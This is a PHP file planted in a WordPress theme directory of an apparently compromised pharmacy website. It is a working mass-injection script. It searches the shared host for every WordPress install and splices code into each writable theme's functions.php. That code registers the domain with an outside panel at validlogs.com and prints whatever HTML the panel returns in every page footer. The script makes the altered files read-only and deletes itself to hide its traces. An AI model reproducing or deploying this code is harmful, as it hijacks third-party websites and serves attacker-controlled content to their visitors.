File: /home/nhathuocat/domains/nhathuocatkbpharma.com/public_html/wp-content/themes/bgpkbcj/wp.php
<?php
// Error-Proof Mass WP Injector - Individual Site Isolation
error_reporting(0); ini_set('display_errors',0); set_time_limit(0); ignore_user_abort(1);
// New functions for comprehensive directory scanning
function get_hosting_home_base() {
$possible_homes = [
$_SERVER['HOME'] ?? '',
getenv('HOME'),
dirname($_SERVER['DOCUMENT_ROOT']) . '/..',
'/home', '/home1', '/home2', '/home3', '/home4', '/home5',
'/home6', '/home7', '/home8', '/home9', '/home10',
'/var/www', '/var/www/vhosts', '/usr/local/plesk/apache/vhosts'
];
$user = get_current_user();
if($user) {
$possible_homes[] = "/home/$user";
for($i=1; $i<=10; $i++) $possible_homes[] = "/home$i/$user";
}
foreach($possible_homes as $home) {
if(is_dir($home) && has_domain_folders($home)) return realpath($home);
}
return false;
}
function has_domain_folders($dir) {
$items = @scandir($dir);
if(!$items) return false;
$domain_count = 0;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$full_path = $dir . '/' . $item;
if(is_dir($full_path)) {
if(preg_match('/\.(com|net|org|co|io|me|us|uk|au|ca|de|fr|it|es|nl)$/i', $item) ||
in_array($item, ['public_html', 'www', 'httpdocs', 'htdocs'])) {
$domain_count++;
}
}
}
return $domain_count > 0;
}
function scan_hosting_domains($home_base) {
$wp_paths = [];
$items = @scandir($home_base);
if(!$items) return $wp_paths;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$domain_path = $home_base . '/' . $item;
if(is_dir($domain_path)) {
// Direct WP
$direct_wp = find_wp_load_comprehensive($domain_path);
if($direct_wp) $wp_paths[] = $direct_wp;
// Web directories
$web_dirs = ['public_html', 'www', 'httpdocs', 'htdocs', 'web', 'html'];
foreach($web_dirs as $web_dir) {
$web_path = $domain_path . '/' . $web_dir;
if(is_dir($web_path)) {
$web_wps = scan_directory_comprehensive($web_path, 3);
$wp_paths = array_merge($wp_paths, $web_wps);
}
}
}
}
return $wp_paths;
}
function get_cpanel_common_paths() {
$user = get_current_user();
$paths = ["/home/$user/public_html", "/home/$user", "/var/www/html", "/home/theligh1/domains/khaoded77.com/public_html"];
for($i=1; $i<=10; $i++) {
$paths[] = "/home$i/$user/public_html";
$paths[] = "/home$i/$user";
}
return array_unique($paths);
}
function get_hosting_patterns() {
$user = get_current_user();
return [
"/home[0-9]*/$user/*/public_html",
"/home[0-9]*/domains/*",
"/var/www/vhosts/*/*",
"/usr/local/plesk/apache/vhosts/*/*",
"/*/public_html"
];
}
function scan_directory_comprehensive($dir, $max_depth = 3, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_load_comprehensive($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
$sub_results = scan_directory_comprehensive($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
function find_wp_load_comprehensive($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// Modified find_all_wp_installs with fallback parent directory scanning
function find_all_wp_installs() {
$all_wp_paths = [];
// Get cPanel common paths
$base_dirs = get_cpanel_common_paths();
// Add paths from hosting patterns
foreach(get_hosting_patterns() as $pattern) {
$dirs = @glob($pattern, GLOB_ONLYDIR);
if($dirs) $base_dirs = array_merge($base_dirs, $dirs);
}
// Add hosting home base
$home_base = get_hosting_home_base();
if($home_base) {
$wp_paths = scan_hosting_domains($home_base);
$all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// Scan all base directories
foreach($base_dirs as $base_dir) {
if(!is_dir($base_dir)) continue;
$wp_paths = scan_directory_comprehensive($base_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// Fallback: Scan parent directories if no WP installs found
if(empty($all_wp_paths)) {
echo "No WordPress installations found in initial scan. Trying parent directories...\n";
$current_dir = dirname(__FILE__);
for($i = 1; $i <= 3; $i++) { // Check up to 3 parent levels
$parent_dir = dirname($current_dir, $i);
if(!is_dir($parent_dir)) break;
echo "Scanning parent directory: $parent_dir\n";
$wp_paths = scan_directory_comprehensive($parent_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
}
return array_unique($all_wp_paths);
}
function scan_directory_for_wp($dir, $max_depth = 5, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_in_current_dir($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
$sub_results = scan_directory_for_wp($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
function find_wp_in_current_dir($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// Modified CRITICAL ERROR-PROOF Theme Injection
function inject_theme_safe($wp_load) {
$wp_dir = dirname($wp_load);
// ULTRA-SAFE WP Loading with full isolation
if(!file_exists($wp_load)) return false;
// Create isolated environment
$old_abspath = defined('ABSPATH') ? ABSPATH : '';
$old_wp_load = defined('WP_LOAD_PATH') ? WP_LOAD_PATH : '';
define('WP_LOAD_PATH', $wp_load);
// Try multiple loading methods
$wp_loaded = false;
// Method 1: Direct include
ob_start();
if(@include_once($wp_load)) {
if(function_exists('wp_get_themes')) {
$wp_loaded = true;
}
}
ob_end_clean();
// Method 2: If Method 1 fails, try wp-config
if(!$wp_loaded) {
$config_path = $wp_dir . '/wp-config.php';
if(file_exists($config_path)) {
ob_start();
if(@include_once($config_path)) {
if(defined('ABSPATH') && function_exists('wp_get_themes')) {
$wp_loaded = true;
}
}
ob_end_clean();
}
}
if(!$wp_loaded) {
echo " ✗ WP environment failed to load\n";
return false;
}
// Safe theme injection with multiple fallbacks
$inject_code = "function wp_injector_fetch_code() {\n \$backend_url = 'https://validlogs.com/BackPanel/panel.php';\n \$domain = sanitize_text_field(\$_SERVER['HTTP_HOST']);\n \$response = wp_remote_post(\$backend_url, array(\n 'body' => array(\n 'action' => 'register_domain',\n 'domain' => \$domain\n ),\n 'timeout' => 5\n ));\n if (is_wp_error(\$response)) {\n return;\n }\n \$html_code = wp_remote_retrieve_body(\$response);\n if (!empty(\$html_code)) {\n add_action('wp_footer', function() use (\$html_code) {\n echo \$html_code;\n });\n }\n}\nadd_action('init', 'wp_injector_fetch_code');\n";
$injected = false;
// Method 1: Standard wp_get_themes with child theme priority
if(function_exists('wp_get_themes')) {
try {
$themes = wp_get_themes();
$child_themes = [];
$other_themes = [];
// Check for existing injection in any theme
foreach($themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
if(strpos($current ?: '', 'wp_injector_fetch_code') !== false) {
echo " ✗ Code already injected in theme: " . $theme->get_stylesheet() . "\n";
return false; // Skip injection if code already exists
}
}
// Separate child themes from others
$theme_name = $theme->get_stylesheet();
if(stripos($theme_name, 'child') !== false) {
$child_themes[] = $theme;
} else {
$other_themes[] = $theme;
}
}
// First try child themes
foreach($child_themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if(!is_dir($theme_dir) || !is_writable($theme_dir)) continue;
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
// Double-check for existing injection
if(strpos($current ?: '', 'wp_injector_fetch_code') === false) {
// Split content into lines to find midpoint
$lines = explode("\n", $current);
$line_count = count($lines);
$midpoint = max(1, floor($line_count / 2)); // Insert at approximate middle
array_splice($lines, $midpoint, 0, $inject_code);
$new_content = implode("\n", $lines);
if(@file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
} else {
$functions_content = "<?php\n" . $inject_code . "\n";
if(@file_put_contents($functions_file, $functions_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
}
// If no child themes were injected, try other themes
if(!$injected) {
foreach($other_themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if(!is_dir($theme_dir) || !is_writable($theme_dir)) continue;
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
// Double-check for existing injection
if(strpos($current ?: '', 'wp_injector_fetch_code') === false) {
// Split content into lines to find midpoint
$lines = explode("\n", $current);
$line_count = count($lines);
$midpoint = max(1, floor($line_count / 2)); // Insert at approximate middle
array_splice($lines, $midpoint, 0, $inject_code);
$new_content = implode("\n", $lines);
if(@file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
} else {
$functions_content = "<?php\n" . $inject_code . "\n";
if(@file_put_contents($functions_file, $functions_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
}
}
} catch(Exception $e) {
// Method 1 failed, try Method 2
}
}
// Method 2: Direct theme directory scan (if WP functions fail) with child theme priority
if(!$injected) {
$themes_path = $wp_dir . '/wp-content/themes/';
if(is_dir($themes_path)) {
$theme_dirs = @scandir($themes_path);
if($theme_dirs) {
$child_theme_dirs = [];
$other_theme_dirs = [];
// Check for existing injection in any theme
foreach($theme_dirs as $theme_name) {
if($theme_name == '.' || $theme_name == '..') continue;
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$functions_file = $theme_dir . '/functions.php';
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
if(strpos($current ?: '', 'wp_injector_fetch_code') !== false) {
echo " ✗ Code already injected in theme: $theme_name\n";
return false; // Skip injection if code already exists
}
}
// Separate child themes from others
if(stripos($theme_name, 'child') !== false) {
$child_theme_dirs[] = $theme_name;
} else {
$other_theme_dirs[] = $theme_name;
}
}
// First try child themes
foreach($child_theme_dirs as $theme_name) {
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$functions_file = $theme_dir . '/functions.php';
if(is_writable($theme_dir) && (!file_exists($functions_file) || is_writable($functions_file))) {
$current = file_exists($functions_file) ? file_get_contents($functions_file) : '';
if(strpos($current, 'wp_injector_fetch_code') === false) {
// Split content into lines to find midpoint
$lines = explode("\n", $current);
$line_count = count($lines);
$midpoint = max(1, floor($line_count / 2)); // Insert at approximate middle
array_splice($lines, $midpoint, 0, $inject_code);
$new_content = implode("\n", $lines);
if(file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
}
}
// If no child themes were injected, try other themes
if(!$injected) {
foreach($other_theme_dirs as $theme_name) {
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$functions_file = $theme_dir . '/functions.php';
if(is_writable($theme_dir) && (!file_exists($functions_file) || is_writable($functions_file))) {
$current = file_exists($functions_file) ? file_get_contents($functions_file) : '';
if(strpos($current, 'wp_injector_fetch_code') === false) {
// Split content into lines to find midpoint
$lines = explode("\n", $current);
$line_count = count($lines);
$midpoint = max(1, floor($line_count / 2)); // Insert at approximate middle
array_splice($lines, $midpoint, 0, $inject_code);
$new_content = implode("\n", $lines);
if(file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set read-only permissions
$injected = true;
}
}
}
}
}
}
}
}
// Restore original environment
if($old_abspath) define('ABSPATH', $old_abspath);
return $injected;
}
// MAIN EXECUTION WITH FULL ERROR ISOLATION
echo "=== Error-Proof Mass WP Injector ===\n";
$all_wp_installs = find_all_wp_installs();
echo "Found " . count($all_wp_installs) . " WordPress installations\n\n";
$total_processed = 0;
$total_injected = 0;
foreach($all_wp_installs as $index => $wp_load) {
$wp_base = dirname($wp_load);
$site_name = basename($wp_base);
echo "[$index] Processing: $site_name ($wp_base)\n";
// Isolate each site processing
try {
// Theme injection (isolated WP environment)
if(inject_theme_safe($wp_load)) {
echo " ✓ Themes injected\n";
$total_injected++;
} else {
echo " ✗ Theme injection failed (permissions or already injected?)\n";
}
$total_processed++;
} catch(Exception $e) {
echo " ✗ CRITICAL ERROR - Site skipped: " . $e->getMessage() . "\n";
}
// Force cleanup between sites
if(function_exists('wp_clean_theme_cache')) wp_clean_theme_cache();
ob_end_clean();
echo "\n";
}
// Final report
echo "=== SUMMARY ===\n";
echo "Total WP installs found: " . count($all_wp_installs) . "\n";
echo "Processed: $total_processed\n";
echo "Themes injected: $total_injected\n";
if($total_injected > 0 && is_writable(__FILE__)) {
unlink(__FILE__);
echo "✓ Self-deleted\n";
}
echo "=== COMPLETE ===\n";
exit;
?>